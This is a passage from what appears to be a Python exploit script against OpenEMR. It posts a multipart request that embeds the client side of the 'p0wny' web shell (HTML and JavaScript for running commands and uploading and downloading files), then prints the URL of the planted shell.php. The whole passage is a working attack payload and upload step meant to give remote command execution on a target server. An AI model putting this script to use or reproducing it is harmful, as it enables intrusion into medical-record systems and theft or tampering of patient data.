content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_dest_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_education\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"bn_save\"\r\n\r\nSave\r\n-----------------------------31900464228840324774249185339--\r\n" # Send Exploit: session.post(exploit_url, headers=header, data=body) # Finish path = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php' print('[+] Webshell: ' + path)
  20. HireHackking

    Notex the best notes 6.4 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC) # Date: 06-14-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217 # Version: 6.4 # Category: DoS (iOS) ##### Vulnerability ##### Notex – the best notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
  21. HireHackking

    Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) # Date: 06-14-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/secure-notepad-private-notes/id711178888 # Version: 3.0.3 # Category: DoS (iOS) ##### Vulnerability ##### Secure Notepad - Private Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
  22. HireHackking

    Post-it 5.0.1 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Post-it 5.0.1 - Denial of Service (PoC) # Date: 06-14-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/es/app/post-it/id920127738 # Version: 5.0.1 # Category: DoS (iOS) ##### Vulnerability ##### Post-it is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
  23. HireHackking

    Client Management System 1.1 - 'Search' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Client Management System 1.1 - 'Search' SQL Injection # Date: 14 June 2021 # Exploit Author: BHAVESH KAUL # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/ # Version: 1.1 # Tested on: Server: XAMPP # Description # Client Management System 1.1 is vulnerable to SQL Injection in the admin panel 'search invoices' field because of insufficient user supplied data sanitization. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/clientms/admin/index.php 2) Login as admin using test credentials: admin/Test@123 3) Goto: http://localhost/clientms/admin/search-invoices.php 4) Enter the following payload in the search field: ' OR 'x'='x 5) All results are showed instead of none ==> SQL Injection success
  24. HireHackking

    Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS) # Date: 14 June 2021 # Exploit Author: BHAVESH KAUL # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/ # Version: 1.1 # Tested on: Server: XAMPP # Description # Client Management System 1.1 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitization. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/clientms/admin/index.php 2) Login as admin using test credentials: admin/Test@123 3) Goto: http://localhost/clientms/admin/admin-profile.php 4) Enter the following payload in the user name field: <script>alert(1)</script> 5) Click on Update 6) Our payload is fired and stored
  25. HireHackking

    Brother BRPrint Auditor - 'Multiple' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Brother BRPrint Auditor 3.0.7 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 14-06-2021 # Vendor Homepage: https://support.brother.com/ # Software Links: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=dcp7060d_all&os=10013&dlid=dlf102753_000&flang=4&type3=214 # Tested Version: 3.0.7 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ BrPrAuSvc BrAuSvc C:\Program Files (x86)\Brother\BRPrintAuditor\Brsvau3a.exe Auto Brother BRPrintAuditor Agent BRPA_Agent C:\Program Files (x86)\Brother\BRPrintAuditor\BRAgtSrv.exe Auto C:\Users\IEUser>sc qc BrAuSvc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: BrAuSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Brother\BRPrintAuditor\Brsvau3a.exe GRUPO_ORDEN_CARGA : BrotherSplGroup ETIQUETA : 0 NOMBRE_MOSTRAR : BrPrAuSvc DEPENDENCIAS : Spooler NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\IEUser>sc qc BRPA_Agent [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: BRPA_Agent TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Brother\BRPrintAuditor\BRAgtSrv.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Brother BRPrintAuditor Agent DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem